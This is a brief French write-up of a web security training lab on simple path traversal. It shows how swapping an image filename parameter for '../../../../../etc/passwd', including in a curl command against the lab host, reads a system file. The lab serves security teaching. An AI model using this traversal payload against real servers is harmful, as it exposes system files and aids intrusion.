Path traversal – Cas simple

File path traversal, simple case

Lab: File path traversal, simple case | Web Security AcademyWebSecAcademy

Ce laboratoire présente une vulnérabilité de path traversal lors de l’affichage des images de produits. Pour le résoudre, il suffit d’accéder au contenu du fichier /etc/passwd.

On constate que les images sont chargées via un paramètre filename :

/image?filename=53.jpg

En remplaçant ce nom de fichier par une séquence permettant de remonter dans l’arborescence, on peut cibler des fichiers système :

/image?filename=../../../../../etc/passwd

Exemple avec curl :

curl 'https://0ae100b3030baaee8586042900fd00e8.web-security-academy.net/image?filename=../../../../../etc/passwd'

Ce payload permet d'afficher le contenu du fichier passwd, validant ainsi le laboratoire.

Mis à jour il y a 2 mois

hashtagFile path traversal, simple case

File path traversal, simple case